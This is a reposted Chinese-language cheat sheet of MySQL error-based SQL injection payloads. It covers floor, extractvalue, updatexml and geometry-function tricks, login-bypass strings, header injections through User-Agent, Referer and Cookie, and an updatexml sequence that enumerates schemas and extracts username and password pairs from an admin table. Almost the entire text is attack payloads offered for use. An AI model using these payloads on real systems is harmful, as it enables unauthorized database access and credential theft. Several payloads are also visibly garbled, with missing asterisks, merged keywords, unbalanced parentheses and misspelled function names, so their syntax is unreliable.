報錯注入

本文轉載自查看原文 2019-06-27 21:09 423

1、通過floor報錯,注入語句如下:
and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

2、通過ExtractValue報錯,注入語句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通過UpdateXml報錯,注入語句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通過NAME_CONST報錯,注入語句如下:
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通過join報錯,注入語句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

6、通過exp報錯,注入語句如下:
and exp(~(select * from (select user () ) a) );

7、通過GeometryCollection()報錯,注入語句如下:
and GeometryCollection(()select *from(select user () )a)b );

8、通過polygon ()報錯,注入語句如下:
and polygon (()select * from(select user ())a)b );

9、通過multipoint ()報錯,注入語句如下:
and multipoint (()select * from(select user() )a)b );

10、通過multlinestring ()報錯,注入語句如下:
and multlinestring (()select * from(selectuser () )a)b );

11、通過multpolygon ()報錯,注入語句如下:
and multpolygon (()select * from(selectuser () )a)b );

12、通過linestring ()報錯,注入語句如下:
and linestring (()select * from(select user() )a)b );

關於POST注入

常用的萬能username語句：
a ’ or 1=1 #
a ") or 1=1 #
a‘) or 1=1 #
a” or “1”=”1
' or '1'='1
' or (length(database())) = 8 (用於輸入’ “都沒有錯誤)
' or (ascii(substr((select database()) ,1,1))) = 115 # (用於輸入’ “都沒有錯誤)
") or ("1")=("1
") or 1=1 or if(1=1, sleep(1), null) #
") or (length(database())) = 8 #
") or (ascii(substr((select database()) ,1,1))) = 115 or if(1=1, sleep(1), null) #

post型盲注通殺payload：

uname=admin%df'or()or%200%23&passwd=&submit=Submit

關於UPDATEXML,REFERER,COOKIE的構造

User-Agent:.........' or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
Referer: ’ or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
Cookie:username: admin ’ or updatexml(1,concat(0x7e,database(),0x7e),1) #

updatexml報錯注入

爆數據庫版本信息：?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
鏈接用戶：?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
鏈接數據庫：?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
爆庫：?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆表：?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段：?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段內容：?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

鏈接：https://www.jianshu.com/p/bc35f8dd4f7c

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 sql注入（報錯注入） SQL注入——報錯注入 Oracle報錯注入總結 @Autowired注入報錯 MYSQL updatexml報錯注入 IDEA 注入 Mapper 報錯 sql報錯注入基於報錯的SQL注入整理 updatexml()報錯注入 SQL注入--盲注及報錯注入